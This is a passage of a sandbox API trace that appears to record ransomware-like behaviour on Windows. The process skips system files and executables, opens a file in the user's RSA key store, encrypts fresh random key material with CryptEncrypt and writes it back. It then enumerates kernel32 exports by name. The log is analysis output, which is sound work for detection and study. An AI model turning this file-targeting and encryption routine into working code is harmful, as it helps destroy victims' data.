(lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="ntuser.dat.log") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="thumbs.db") returned -1 [0180.502] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6", lpString2="Bootfont.bin") returned -1 [0180.502] lstrlenW (lpString="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6") returned 74 [0180.502] lstrcmpiW (lpString1="3xS6", lpString2="lnk") returned -1 [0180.502] lstrcmpiW (lpString1="3xS6", lpString2="exe") returned -1 [0180.502] lstrcmpiW (lpString1="3xS6", lpString2="sys") returned -1 [0180.502] lstrcmpiW (lpString1="3xS6", lpString2="dll") returned -1 [0180.502] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0180.502] lstrlenW (lpString="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6") returned 74 [0180.502] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0180.502] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6" [0180.502] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xs6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0180.503] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=351) returned 1 [0180.503] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0180.503] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.503] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.503] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.503] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.504] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0180.504] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.504] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.505] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.505] CloseHandle (hObject=0x288) returned 1 [0180.505] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.505] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0180.506] CloseHandle (hObject=0x0) returned 0 [0180.506] CloseHandle (hObject=0x284) returned 1 [0180.506] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.506] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.506] GetTickCount () returned 0x1134912 [0180.506] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.507] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.507] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.507] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.507] lstrlenA (lpString="kernel32.dll") returned 12 [0180.507] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.507] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.507] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.507] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.507] lstrlenA (lpString="ADDATOMA") returned 8 [0180.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.507] lstrlenA (lpString="ADDATOMW") returned 8 [0180.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.508] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.508] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.508] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.508] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.508] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.508] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.508] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.508] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.508] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.508] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.508] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.508] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.508] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.508] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.508] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.508] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.508] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.508] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.508] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.509] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.509] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.509] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.509] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.509] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.509] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.509] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.509] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.509] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.509] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.509] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.509] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.509] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.509] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.509] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.509] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.509] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.509] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.510] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.510] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.510] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.510] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.510] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.510] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.510] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.510] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.510] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.510] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.510] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.510] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.510] lstrlenA (lpString="BEEP") returned 4 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.510] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.510] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.510] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.510] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.510] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.510] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.511] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.511] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.511] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.511] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.511] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.511] lstrlenA (lpString="CANCELIO") returned 8 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.511] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.511] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.511] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.511] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.511] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.511] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.511] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.511] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.511] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.511] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.511] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.511] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.511] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.512] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.512] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.512] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.512] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.512] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.512] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.512] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.512] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.512] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.512] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.512] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.512] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.512] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.512] lstrcpyA (in: 